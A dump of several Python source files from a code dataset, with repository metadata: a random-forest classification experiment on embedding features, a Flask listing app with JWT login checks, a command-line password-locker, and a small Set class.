part3_pos_10_walk_dv = combineData(source1_pos=part3_pos_10, source3_pos=part3_pos_200, source2_pos=part3_pos_walk_200)
# 1992
part4_pos_10_walk = combineData(source1_pos=part4_pos_10, source2_pos=part4_pos_walk_200)
part4_pos_10_walk_dv = combineData(source1_pos=part4_pos_10, source3_pos=part4_pos_200, source2_pos=part4_pos_walk_200)
# 5952
part5_pos_10_walk = combineData(source1_pos=part5_pos_10, source2_pos=part5_pos_walk_200)
part5_pos_10_walk_dv = combineData(source1_pos=part5_pos_10, source3_pos=part5_pos_200, source2_pos=part5_pos_walk_200)
(combPos_10_walk, combNeg_10_walk) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=None,
source3_neg=None)
(combPos_10_walk_dv, combNeg_10_walk_dv) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=global_pos_200,
source3_neg=global_neg_200)
# functions
# general function for taking samples from a list
print 'defining function...'
# averaging the results from trials
# input should be lists of 10 or 210 dimensions
# trialsWithVariedTrainSize
if __name__ == "__main__":
# experiment execution
print "start training..."
print 'part1 vs others classifer...'
# 10_walk_dv
print "train part1 test other parts with 10_walk_dv..."
(part1_10_walk_dv, generalResultsPosNumRef) = trialsWithVariedTrainSize(num_pos_sample=901,
num_pos_sample_cap=901,
neg_pos_ratio=1,
pos_training_dataset=part1_pos_10_walk_dv,
pos_testing_dataset=part2_pos_10_walk_dv + part3_pos_10_walk_dv + part4_pos_10_walk_dv + part5_pos_10_walk_dv,
neg_dataset=combNeg_10_walk_dv,
train_test_split=0,
test_stratify=True,
scoring="f1",
plt_or_not=False,
save=False)
targ = part1_10_walk_dv
max_f1 = max(targ[0][3]) # 0.5885
index_max_f1 = targ[0][3].index(max(targ[0][3])) # 73
prec_at_max_f1 = targ[0][1][index_max_f1] # 0.5536
rec_at_max_f1 = targ[0][2][index_max_f1] # 0.6204
print "index: %d, f1: %f, prec: %f, rec: %f" % (
index_max_f1, round(max_f1, 4), round(prec_at_max_f1, 4), round(rec_at_max_f1, 4))
print 'done!'
| 43.393593
| 186
| 0.590729
|
from __future__ import division
import json
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from sklearn.linear_model import LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier as RFC
import pandas as pd
import operator
from sklearn.metrics import roc_curve, precision_recall_curve, precision_recall_fscore_support
print 'IMPORTANT: experiment can be modified by changing parameter combinations in main function!'
print 'loading data...'
part1_pos_10 = json.loads(open("new_dedup_part1_pos_10.json").read()) # 1552
part1_pos_200 = json.loads(open("new_dedup_part1_pos_200_embed.json").read())
part1_pos_walk_200 = json.loads(open("new_dedup_part1_pos_200_walk.json").read())
part2_pos_10 = json.loads(open("new_dedup_part2_pos_10.json").read()) # 24251
part2_pos_200 = json.loads(open("new_dedup_part2_pos_200_embed.json").read())
part2_pos_walk_200 = json.loads(open("new_dedup_part2_pos_200_walk.json").read())
part3_pos_10 = json.loads(open("new_dedup_part3_pos_10.json").read()) # 1353
part3_pos_200 = json.loads(open("new_dedup_part3_pos_200_embed.json").read())
part3_pos_walk_200 = json.loads(open("new_dedup_part3_pos_200_walk.json").read())
part4_pos_10 = json.loads(open("new_dedup_part4_pos_10.json").read()) # 3399
part4_pos_200 = json.loads(open("new_dedup_part4_pos_200_embed.json").read())
part4_pos_walk_200 = json.loads(open("new_dedup_part4_pos_200_walk.json").read())
part5_pos_10 = json.loads(open("new_dedup_part5_pos_10.json").read()) # 11692
part5_pos_200 = json.loads(open("new_dedup_part5_pos_200_embed.json").read())
part5_pos_walk_200 = json.loads(open("new_dedup_part5_pos_200_walk.json").read())
global_pos_10 = json.loads(open("new_dedup_global_pos_10.json").read()) # 1552
global_pos_200 = json.loads(open("new_dedup_global_pos_200_embed.json").read())
global_pos_walk_200 = json.loads(open("new_dedup_global_pos_200_walk.json").read())
global_neg_10 = json.loads(open("new_dedup_global_neg_10.json").read()) # 1552
global_neg_200 = json.loads(open("new_dedup_global_neg_200_embed.json").read())
global_neg_walk_200 = json.loads(open("new_dedup_global_neg_200_walk.json").read())
def combineData(source1_pos=None,
source1_neg=None,
source2_pos=None,
source2_neg=None,
source3_pos=None,
source3_neg=None):
# assert (len(source1_pos) == len(source2_pos) == len(source3_pos)), "pos should be equal length"
# assert (len(source1_neg) == len(source2_neg) == len(source3_neg)), "neg should be equal length"
comb_pos = []
comb_neg = []
if source3_pos == None: # only combine two datasets
for i in range(len(source1_pos)):
comb_pos.append(source1_pos[i] + source2_pos[i])
if source1_neg != None:
for i in range(len(source1_neg)):
comb_neg.append(source1_neg[i] + source2_neg[i])
else:
for i in range(len(source1_pos)):
comb_pos.append(source1_pos[i] + source2_pos[i] + source3_pos[i])
if source1_neg != None:
for i in range(len(source1_neg)):
comb_neg.append(source1_neg[i] + source2_neg[i] + source3_neg[i])
if len(comb_neg) == 0:
return comb_pos
else:
return (comb_pos, comb_neg)
# combinations of each partition
# 901
part1_pos_10_walk = combineData(source1_pos=part1_pos_10, source2_pos=part1_pos_walk_200)
part1_pos_10_walk_dv = combineData(source1_pos=part1_pos_10, source3_pos=part1_pos_200, source2_pos=part1_pos_walk_200)
# 12294
part2_pos_10_walk = combineData(source1_pos=part2_pos_10, source2_pos=part2_pos_walk_200)
part2_pos_10_walk_dv = combineData(source1_pos=part2_pos_10, source3_pos=part2_pos_200, source2_pos=part2_pos_walk_200)
# 895
part3_pos_10_walk = combineData(source1_pos=part3_pos_10, source2_pos=part3_pos_walk_200)
part3_pos_10_walk_dv = combineData(source1_pos=part3_pos_10, source3_pos=part3_pos_200, source2_pos=part3_pos_walk_200)
# 1992
part4_pos_10_walk = combineData(source1_pos=part4_pos_10, source2_pos=part4_pos_walk_200)
part4_pos_10_walk_dv = combineData(source1_pos=part4_pos_10, source3_pos=part4_pos_200, source2_pos=part4_pos_walk_200)
# 5952
part5_pos_10_walk = combineData(source1_pos=part5_pos_10, source2_pos=part5_pos_walk_200)
part5_pos_10_walk_dv = combineData(source1_pos=part5_pos_10, source3_pos=part5_pos_200, source2_pos=part5_pos_walk_200)
(combPos_10_walk, combNeg_10_walk) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=None,
source3_neg=None)
(combPos_10_walk_dv, combNeg_10_walk_dv) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=global_pos_200,
source3_neg=global_neg_200)
# functions
# general function for taking samples from a list
print 'defining function...'
def takingSamples(alist, num=0, portion=0):
assert ((num > 0 and portion == 0) or (num == 0 and portion > 0)), "should offer only one method, num or portion"
seed = int(round(time.time() * 1000)) % 100000000
random.seed(seed)
length_of_list = len(alist)
listPicked = []
listNotPicked = []
if num > 0:
chosen_ids = set()
while len(chosen_ids) < num:
tmpRandInt = random.randint(0, length_of_list - 1) # cover both head and tail
chosen_ids.add(tmpRandInt)
t_f_list = [False for i in range(length_of_list)]
for i in chosen_ids:
t_f_list[i] = True
for i, j in enumerate(t_f_list):
if j:
listPicked.append(alist[i])
else:
listNotPicked.append(alist[i])
if portion > 0:
num = int(length_of_list * portion)
chosen_ids = set()
while len(chosen_ids) < num:
tmpRandInt = random.randint(0, length_of_list - 1) # cover both head and tail
chosen_ids.add(tmpRandInt)
t_f_list = [False for i in range(length_of_list)]
for i in chosen_ids:
t_f_list[i] = True
for i, j in enumerate(t_f_list):
if j:
listPicked.append(alist[i])
else:
listNotPicked.append(alist[i])
return (listPicked, listNotPicked)
# usage e.g.
# (listPicked, listNotPicked) = takingSamples([1,2,3,4,5,6], num=4)
# (listPicked, listNotPicked) = takingSamples([[1,2],[2,5],[3,7],[4,6],[5,5],[6,1]], num=4)
# print listPicked
# print listNotPicked
# averaging the results from trials
def avgProcess(trialsAns):
trialsAns_np = np.array(trialsAns)
num_trial = len(trialsAns_np) # 10
# place holder for average threshold, precision, recall, f1
avg_thres = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_prec = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_rec = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_f1 = np.array([0.0 for i in range(len(trialsAns_np[0]))])
for i in range(num_trial):
tmp = np.array(trialsAns_np[i])
avg_thres += tmp[:, 0] # the 0th column
avg_prec += tmp[:, 1]
avg_rec += tmp[:, 2]
avg_f1 += tmp[:, 3]
avg_thres = avg_thres / float(num_trial)
avg_prec = avg_prec / float(num_trial)
avg_rec = avg_rec / float(num_trial)
avg_f1 = avg_f1 / float(num_trial)
avg_thres = list(avg_thres)
avg_prec = list(avg_prec)
avg_rec = list(avg_rec)
avg_f1 = list(avg_f1)
return (avg_thres, avg_prec, avg_rec, avg_f1)
# input should be lists of 10 or 210 dimensions
def oneTrialWithCertainTrainSize(num_pos_sample=50,
neg_pos_ratio=1,
pos_training_dataset=None,
pos_testing_dataset=None,
neg_dataset=None,
train_test_split=0,
# obselete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
test_stratify=True,
# obselete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
scoring="f1",
plt_or_not=True):
assert (type(pos_training_dataset) == list and type(neg_dataset) == list), "input datasets should be lists"
num_neg_sample = int(num_pos_sample * neg_pos_ratio)
# take sample of num_pos_sample number of positive examples
(posPicked, posNotPicked) = takingSamples(pos_training_dataset, num=num_pos_sample)
(negPicked, negNotPicked) = takingSamples(neg_dataset, num=num_neg_sample)
# create train_X, train_y
train_X = pd.DataFrame(posPicked + negPicked)
train_y = np.array([1 for i in range(len(posPicked))] + [0 for i in range(len(negPicked))])
# create test_X and test_y
if train_test_split != 0:
testSize = int(
(num_pos_sample + num_neg_sample) / train_test_split * (1 - train_test_split)) # size of test set
if test_stratify:
testPosSize = int(float(testSize) / (neg_pos_ratio + 1))
testNegSize = testSize - testPosSize
test_X = pd.DataFrame(
takingSamples(posNotPicked, num=testPosSize)[0] + takingSamples(negNotPicked, num=testNegSize)[0]) #
test_y = np.array([1 for i in range(testPosSize)] + [0 for i in range(testNegSize)])
else:
for idx in range(len(posNotPicked)):
posNotPicked[idx].append(1)
for idx in range(len(negNotPicked)):
negNotPicked[idx].append(0)
test_X = pd.DataFrame(takingSamples(posNotPicked + negNotPicked, num=testSize)[0])
test_y = np.array()
for i in test_X:
if i[-1] == 1:
test_y.append(1)
else:
test_y.append(0)
for idx in range(len(test_X)):
del test_X[idx][-1]
else:
if (pos_testing_dataset == None):
test_X = pd.DataFrame(posNotPicked + negNotPicked)
test_y = np.array([1 for i in range(len(posNotPicked))] + [0 for i in range(len(negNotPicked))])
else:
test_X = pd.DataFrame(pos_testing_dataset + negNotPicked)
test_y = np.array([1 for i in range(len(pos_testing_dataset))] + [0 for i in range(len(negNotPicked))])
# train and test the model
reg = RFC(n_estimators=100)
# reg = RFC(n_estimators=200, max_features='log2')
# reg = LogisticRegressionCV(scoring=scoring)
LogModel = reg.fit(train_X, train_y)
y_predlog = LogModel.predict_proba(test_X)
y_predlog_1 = y_predlog[:, 1]
prec, rec, thresholds = precision_recall_curve(test_y, y_predlog_1)
if plt_or_not:
plt.plot(rec, prec)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.title("Rec-Prec Curve of Logistic Regression Trials")
# pred_combine sorted
pred_combine = []
for i in range(len(test_y)):
pred_combine.append((y_predlog_1[i], test_y[i]))
pred_combine = sorted(pred_combine, key=operator.itemgetter(0))
# create an array of 0.1:0.01:0.99
thres_new = []
initial = 0.1
while initial <= 0.99:
thres_new.append(initial)
initial += 0.01
initial = round(initial, 2)
# generate "threshold, prec, rec, f1" list
# test_y is truth, y_predlog_1 is prob of being 1
result = []
item_index = 0
FN_accu = 0
TN_accu = 0
TP_accu = list(test_y).count(1)
FP_accu = list(test_y).count(0)
for i in thres_new: # i is [0.1:0.01:0.99]
if (item_index < len(pred_combine)):
while pred_combine[item_index][0] < i:
if pred_combine[item_index][1] == 1: # this item actually 1, predict as 0
FN_accu += 1
TP_accu -= 1
else: # this item is actually 0, predict as 0, pred_combine[item_index][1] == 0
TN_accu += 1
FP_accu -= 1
item_index += 1
if (item_index == len(pred_combine)): break
# print "th: " + str(i) + ", TP: " + str(TP_accu) + ", FP: " + str(FP_accu) + ", FN: " + str(FN_accu) + ", TN: " + str(TN_accu)
if (TP_accu == 0):
preci = 0
else:
preci = float(TP_accu) / (TP_accu + FP_accu)
if (TP_accu == 0):
recal = 0
else:
recal = float(TP_accu) / (FN_accu + TP_accu)
if (2 * preci * recal == 0):
fone = 0
else:
fone = 2 * preci * recal / (preci + recal)
result.append([i, preci, recal, fone])
return result # 90
# outArr = oneTrialWithCertainTrainSize(num_pos_sample=60, pos_neg_ratio=1, pos_dataset=global_pos_10_40262, neg_dataset=global_neg_10_402620)
# print "finish"
# trialsWithVariedTrainSize
def trialsWithVariedTrainSize(num_pos_sample=50,
num_pos_sample_cap=1500,
neg_pos_ratio=1,
pos_training_dataset=None,
pos_testing_dataset=None,
neg_dataset=None,
train_test_split=0,
# obsolete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
test_stratify=True,
# obsolete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
scoring="f1",
plt_or_not=True,
num_trial=10,
save=False,
saveName="0"):
generalResults = []
generalResultsPosNumRef = []
generalStdDev = []
while num_pos_sample <= num_pos_sample_cap:
trialsAns = []
# for each num_pos_sample, perform 10 trials
for trialsCount in range(num_trial):
# one single trial
outArr = oneTrialWithCertainTrainSize(num_pos_sample=num_pos_sample, neg_pos_ratio=neg_pos_ratio,
pos_training_dataset=pos_training_dataset,
pos_testing_dataset=pos_testing_dataset, neg_dataset=neg_dataset,
train_test_split=train_test_split, test_stratify=test_stratify,
scoring=scoring, plt_or_not=plt_or_not)
# put outArr together
trialsAns.append(outArr) # outArr = [threshold, prec, rec, f1tmp]
print "trial #" + str(trialsCount + 1) + " finished!"
# with open("trialsAns.json", "w") as f:
# json.dump(trialsAns, f)
print str(num_pos_sample) + " all trials finished!"
# calc std dev of max f1 based on trialsAns
# stdArray = []
# for e in range(len(trialsAns[0])):
# tmpArr = []
# for k in trialsAns:
# tmpArr.append(k[e][3])
# stdArray.append(np.std(np.array(tmpArr)))
#
# stddev = np.average(stdArray)
# generalStdDev.append(stddev)
#
if save == True:
fileName = "rawResults_" + saveName + ".json"
with open(fileName, "w") as f: json.dump(trialsAns, f)
(avg_thres, avg_prec, avg_rec, avg_f1) = avgProcess(trialsAns)
#
generalResults.append([avg_thres, avg_prec, avg_rec, avg_f1])
generalResultsPosNumRef.append(num_pos_sample)
# print results for each trial
targ = generalResults
index = targ[0][3].index(max(targ[0][3]))
for ntrial in range(len(trialsAns)):
fone = trialsAns[ntrial][index][3]
prec = trialsAns[ntrial][index][1]
rec = trialsAns[ntrial][index][2]
print "For trial#" + str(ntrial)
print "f1: %.4f" % fone + ", prec: %.4f" % prec + ", rec: %.4f" % rec
#
print str(num_pos_sample) + " positive finished!"
num_pos_sample += 50
# if num_pos_sample < 200: num_pos_sample += 10
# elif num_pos_sample < 500: num_pos_sample += 50
# else: num_pos_sample += 100
# return (generalResults, generalStdDev, generalResultsPosNumRef)
return (generalResults, generalResultsPosNumRef)
# return None
if __name__ == "__main__":
# experiment execution
print "start training..."
print 'part1 vs others classifer...'
# 10_walk_dv
print "train part1 test other parts with 10_walk_dv..."
(part1_10_walk_dv, generalResultsPosNumRef) = trialsWithVariedTrainSize(num_pos_sample=901,
num_pos_sample_cap=901,
neg_pos_ratio=1,
pos_training_dataset=part1_pos_10_walk_dv,
pos_testing_dataset=part2_pos_10_walk_dv + part3_pos_10_walk_dv + part4_pos_10_walk_dv + part5_pos_10_walk_dv,
neg_dataset=combNeg_10_walk_dv,
train_test_split=0,
test_stratify=True,
scoring="f1",
plt_or_not=False,
save=False)
targ = part1_10_walk_dv
max_f1 = max(targ[0][3]) # 0.5885
index_max_f1 = targ[0][3].index(max(targ[0][3])) # 73
prec_at_max_f1 = targ[0][1][index_max_f1] # 0.5536
rec_at_max_f1 = targ[0][2][index_max_f1] # 0.6204
print "index: %d, f1: %f, prec: %f, rec: %f" % (
index_max_f1, round(max_f1, 4), round(prec_at_max_f1, 4), round(rec_at_max_f1, 4))
print 'done!'
| 12,621
| 0
| 112
|
38652c248a4584e2b2780ee78dd51e86e74e2328
| 7,639
|
py
|
Python
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 2
|
2019-04-20T03:45:51.000Z
|
2019-04-27T05:52:10.000Z
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 3
|
2019-04-21T18:57:32.000Z
|
2019-04-28T15:14:02.000Z
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 4
|
2019-04-23T00:32:21.000Z
|
2019-04-29T22:29:00.000Z
|
# app.py
import pprint
import json
import bson
import jwt
import pymongo
import mongomock
import requests
from flask import Flask
from flask import jsonify
from flask import request
from flask import Response
from flask import abort
from flask import json,jsonify, make_response,session
from flask import render_template,request,redirect,url_for
from apymongodb import APymongodb
import reviewapi
import query
SECRET_KEY = "Secret Key"
#app = Flask(__name__)
#app.config.from_object(__name__)
# create flask instance
app=create_app()
app = Flask(__name__)
app.config.from_object(__name__)
mongodb_uri="project-mongodb"
login_uri="porject-login-flask"
endpoint_access = {'N': ['login'],
'S': ['login']}
def mock_project_mongo_db():
"""
create a mock db for usint testing.
"""
mock_pymondb = APymongodb(test=True)
mock_pymondb.create_db_from_csv()
mock_pymondb.create_auth_db()
return mock_pymondb.db
@app.route('/',methods=['GET'])
def hello_world():
"""
default route for the Team Elf's home page
"""
return '<h1 align=center>Hello, Welcome to the Project webserver of team ELFs</h1>'
@app.route('/maps',methods=['GET'])
def maps():
"""
default route for the Team Elf's home page
"""
return render_template('maps.html',response=request.response)
@app.route('/login', methods=['POST','GET'])
def app_login():
"""
the route for login. This will talk to a standalone app which is running in
the container login-flask:5000
"""
error=None
if app.testing:
return bson.json_util.dumps({'status': 'success'})
else:
print("received requests")
if request.method == 'POST':
try:
#print("request data from browser:", request.data)
#print("request data from browser:", json.loads(request.data))
#rcv_login_req = json.loads(request.data)
#print("request json from browser:", rcv_login_req)
email_addr=request.form['username']
password=request.form['password']
print(email_addr, ",", password)
rcv_login_req={'email_address':email_addr, 'password':password}
# request the login-app to authenticate the user
#pdata1 = {'email_address':'95f7vcnewd8@iffymedia.com', 'password':'5f4dcc3b5aa765d61d8327deb882cf99'}
headers = {'content-type': 'application/json'}
r = requests.post('http://project-login-flask:5000/login', data=bson.json_util.dumps(rcv_login_req), headers=headers)
#print("send request", dir(r))
#r = requests.get('http://login-flask:5000/')
#print("response:", dir(r))
print("response.text:", r.text)
print("response.status_code", r.status_code)
#print("response.json", r.json)
# TODO: Return the JWT here
session['Authorization']=json.loads(r.text)['auth_token']
#return redirect(url_for('order_books'))
#return render_template('login_success.html', error=error)
return '<h1>'+"Success"+'</h1>'
except Exception as e:
print("exception:", str(e))
#return '<h1>'+"error"+'</h1>'
return render_template('login.html', error=error)
@app.route('/review/<string:listing_id>', methods=['GET'])
@app.route('/loginsuccess', methods=['GET'])
# Test using -> curl -X POST -H 'Content-Type: application/json' http://127.0.0.1/getlistings -d '{"bedrooms":"5.0"}'
# See https://gist.github.com/subfuzion/08c5d85437d5d4f00e58
# Run project/run_proj.sh
#http://ec2-18-191-206-216.us-east-2.compute.amazonaws.com/getlistings?zipcode=3018&bedrooms=1&accomodates=0
@app.route('/getlistings', methods=['GET'])
if __name__ == '__main__':
# app = Flask(__name__)
app.run(host='127.0.0.1',port=5000,debug=True)
| 32.785408
| 129
| 0.615002
|
# app.py
import pprint
import json
import bson
import jwt
import pymongo
import mongomock
import requests
from flask import Flask
from flask import jsonify
from flask import request
from flask import Response
from flask import abort
from flask import json,jsonify, make_response,session
from flask import render_template,request,redirect,url_for
from apymongodb import APymongodb
import reviewapi
import query
SECRET_KEY = "Secret Key"
#app = Flask(__name__)
#app.config.from_object(__name__)
# create flask instance
def create_app():
app=Flask(__name__)
return app
app=create_app()
app = Flask(__name__)
app.config.from_object(__name__)
mongodb_uri="project-mongodb"
login_uri="porject-login-flask"
endpoint_access = {'N': ['login'],
'S': ['login']}
def check_endpoint_access(db, email, ep):
l_data = db.authentication.find_one({'email_address': email})
if l_data :
if ep in endpoint_access[l_data['role']]:
return True
return False
def mock_project_mongo_db():
"""
create a mock db for usint testing.
"""
mock_pymondb = APymongodb(test=True)
mock_pymondb.create_db_from_csv()
mock_pymondb.create_auth_db()
return mock_pymondb.db
def real_mongo_db():
print(mongodb_uri)
return pymongo.MongoClient(mongodb_uri)['client_database']
def get_db_instance():
print("Inside get db instance")
print(app.testing)
if app.testing:
db = mock_project_mongo_db()
else:
db = real_mongo_db()
return db
def check_auth_token(request,db, ep=None):
if 'Authorization' in session.keys():
print(session.keys())
auth_token=session['Authorization']
else:
auth_token=""
if auth_token:
try:
payload = jwt.decode(auth_token,
SECRET_KEY,
algorithm="HS256")
db = get_db_instance()
l_data = db.authentication.find_one({'email_address': payload['sub']})
if l_data:
if ep is not None:
if not check_endpoint_access(db, payload['sub'], ep):
return 'error'
return 'success'
else:
return 'error'
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
else:
return 'error: no jwt token provided'
@app.route('/',methods=['GET'])
def hello_world():
"""
default route for the Team Elf's home page
"""
return '<h1 align=center>Hello, Welcome to the Project webserver of team ELFs</h1>'
@app.route('/maps',methods=['GET'])
def maps():
"""
default route for the Team Elf's home page
"""
return render_template('maps.html',response=request.response)
@app.route('/login', methods=['POST','GET'])
def app_login():
"""
the route for login. This will talk to a standalone app which is running in
the container login-flask:5000
"""
error=None
if app.testing:
return bson.json_util.dumps({'status': 'success'})
else:
print("received requests")
if request.method == 'POST':
try:
#print("request data from browser:", request.data)
#print("request data from browser:", json.loads(request.data))
#rcv_login_req = json.loads(request.data)
#print("request json from browser:", rcv_login_req)
email_addr=request.form['username']
password=request.form['password']
print(email_addr, ",", password)
rcv_login_req={'email_address':email_addr, 'password':password}
# request the login-app to authenticate the user
#pdata1 = {'email_address':'95f7vcnewd8@iffymedia.com', 'password':'5f4dcc3b5aa765d61d8327deb882cf99'}
headers = {'content-type': 'application/json'}
r = requests.post('http://project-login-flask:5000/login', data=bson.json_util.dumps(rcv_login_req), headers=headers)
#print("send request", dir(r))
#r = requests.get('http://login-flask:5000/')
#print("response:", dir(r))
print("response.text:", r.text)
print("response.status_code", r.status_code)
#print("response.json", r.json)
# TODO: Return the JWT here
session['Authorization']=json.loads(r.text)['auth_token']
#return redirect(url_for('order_books'))
#return render_template('login_success.html', error=error)
return '<h1>'+"Success"+'</h1>'
except Exception as e:
print("exception:", str(e))
#return '<h1>'+"error"+'</h1>'
return render_template('login.html', error=error)
@app.route('/review/<string:listing_id>', methods=['GET'])
def get_review_by_id(listing_id):
db = get_db_instance()
auth_status = check_auth_token(request, db)
if auth_status == 'success':
reviews = reviewapi.get_review_with_listing_id(listing_id, db)
print("reviews:", reviews)
return render_template('reviews.html',response=reviews)
else:
return '<h1>' + auth_status + '</h1>'
@app.route('/loginsuccess', methods=['GET'])
def get_login_success():
return render_template('login_success.html', error="")
# Test using -> curl -X POST -H 'Content-Type: application/json' http://127.0.0.1/getlistings -d '{"bedrooms":"5.0"}'
# See https://gist.github.com/subfuzion/08c5d85437d5d4f00e58
# Run project/run_proj.sh
#http://ec2-18-191-206-216.us-east-2.compute.amazonaws.com/getlistings?zipcode=3018&bedrooms=1&accomodates=0
@app.route('/getlistings', methods=['GET'])
def get_listings():
def merge_dicts(x, y):
z = x.copy()
z.update(y)
return z
# XXX TODO How to check token using CURL ?
db = get_db_instance()
auth_status = check_auth_token(request, db)
if auth_status != 'success':
return '<h1>' + auth_status + '</h1>'
if request.method == 'GET':
range_params={}
error=None
query_params = { 'country_code' : 'AU' }
zipcode=request.args.get('zipcode')
print(request.args)
if zipcode is None:
return render_template('test1.html', error=error)
else:
db = get_db_instance()
results = {}
query_params['zipcode']=int(request.args.get('zipcode'))
price_max=request.args.get('price').strip()
if price_max.startswith('$'):
pass
else:
price_max="$"+price_max
range_params['price'] = { 'lo' : '$0.00', 'hi' : price_max}
range_params['accomodates']={'lo': int(request.args.get('accomodates')),'hi':10}
range_params['bedrooms']={'lo': int(request.args.get('bedrooms')),'hi':6}
print("query_params",range_params,query_params)
print(query.range_query(range_params,query_params,db))
rv, r = query.range_query(range_params,query_params,db)
if not rv:
print("404")
abort(404)
results["results"] = r
print(results)
if request.args.get('maps') is None:
return render_template('listings.html',response=results)
else:
return render_template('maps.html',response=results)
#return jsonify(results)
if __name__ == '__main__':
# app = Flask(__name__)
app.run(host='127.0.0.1',port=5000,debug=True)
| 3,592
| 0
| 181
|
08b321e691944be60f4baac231100dd16f8af4cc
| 5,529
|
py
|
Python
|
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.8
import pyperclip
import random
import string
from py_lock import personas, profiles
if __name__ == '__main__':
main()
| 31.061798
| 221
| 0.573702
|
#!/usr/bin/env python3.8
import pyperclip
import random
import string
from py_lock import personas, profiles
def create_persona(persona_name, password):
new_persona = personas(persona_name, password)
return new_persona
def save_New_persona(persona_name):
personas.personas_list.append(persona_name)
def accept_persona(persona_name, password):
accept_persona = profiles.confirm_persona(persona_name, password)
return accept_persona
def create_profile(app, persona_name, user_password):
new_profile = profiles(
app, persona_name, user_password
)
return new_profile
def save_profile(py_lock):
py_lock.save_profile()
def delete_profile(py_lock):
py_lock.delete_profile()
def find_profile(app):
return profiles.search_profile(app)
def check_existing_profile(app):
return profiles.profile_exist(app)
def display_profile():
return profiles.display_profile()
def copy_password(app):
profiles.copy_password(app)
def gen_password():
auto_generic_password = profiles.gen_password()
return auto_generic_password
def main():
print("Welome to your user profiles list.Create An Account :CA or Already have an Account LI? :")
short_code = input("CA ,LI").lower()
if short_code == 'ca':
username = input("Enter your prefered username").capitalize()
password = input("Enter Your Password As Well")
save_New_persona(create_persona(username, password))
elif short_code == 'li':
username = input("Enter your prefered username").capitalize()
password = input("Enter Your Password As Well")
validate_persona = (accept_persona(username, password))
if validate_persona == username:
print(f"Hello {username}.Welcome To PassWord Locker Manager")
print('\n')
print("what would you like to do?")
print('\n')
while True:
print("Use these short codes : cc - Create a new credential, dc - Display Credential(s), fc - Find a credential,ex - Exit the application, gp- Generate A randomn password, del- Delete credential,cp-Copy Password")
short_code = input().lower()
if short_code == 'cc':
print("New Profile")
print("-"*10)
print("App name.....")
app_name = input().capitalize()
print("Your App name ...e.g instagram username")
persona_name = input()
while True:
print(" For Type/Paste Password type TP ; For generate_Password type gp")
password == input("Enter").lower()
if password == 'tp':
password = input("Enter Password")
break
elif password == 'gp':
password = gen_password()
break
elif password != 'tp' or 'gp':
print("Invalid password please try again")
break
else:
print("Invalid password please try again")
save_profile(create_profile(app_name, username, password))
print('\n')
print(
f"New Profile : {app_name} UserName: {username} created")
print('\n')
elif short_code == 'dc':
if display_profile():
print(
"Your Account(s) Profile(S) are as follows :")
print('\n')
for password_locker in display_profile():
print(
f"App_name :{password_locker.app_name} ; UserName: {password_locker.username} ; PassWord :{password_locker.password}")
print('\n')
else:
print('\n')
print(
"Oops !!! You dont seem to have any Profile saved yet")
print('\n')
elif short_code == 'fc':
print("Enter the Account Name you want to search for")
search_name = input().capitalize()
if check_existing_profile(search_name):
search_profile = find_profile(search_name)
print(f"app_name:{search_profile.app_name}")
print('-'*100)
print(
f"app_name:{search_profile.app_name} password :{search_profile.password}")
else:
print("That Credential does not exist")
print('\n')
elif short_code == 'cp':
print("Enter the app name of the profile you want to generate password for")
search_name = input().capitalize()
if check_existing_profile(search_name):
search_profile = find_profile(search_name)
print(f"{search_profile.app_name}")
print('-'*20)
password = copy_password(search_name)
print('\n')
print(
f"New profile : {app_name} username: {username} You can proceed and paste to your account")
print('\n')
else:
print("That profile does not exist")
elif short_code == 'gp':
password = gen_password()
elif short_code == 'ex':
print("Happy Coding See You Later and try listening to podcasts mostly bill burr")
break
else:
print("Invalid response kindly refer to the Menu above")
if __name__ == '__main__':
main()
| 5,092
| 0
| 276
|
a111b0cae354e20686401a949e25af061b226bbe
| 585
|
py
|
Python
|
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | 1
|
2018-01-21T06:43:16.000Z
|
2018-01-21T06:43:16.000Z
|
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | null | null | null |
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | null | null | null |
s=Set([1,2,3])
s.add(4)
print s
print ("contains 5,",s.contains(5))
print ("contains 4,",s.contains(4))
s.remove(3)
print (s)
print ("contains 3,",s.contains(3))
| 18.870968
| 45
| 0.574359
|
class Set:
def __init__(self, values=None):
self.dict={}
if values is not None:
for value in values:
self.add(value)
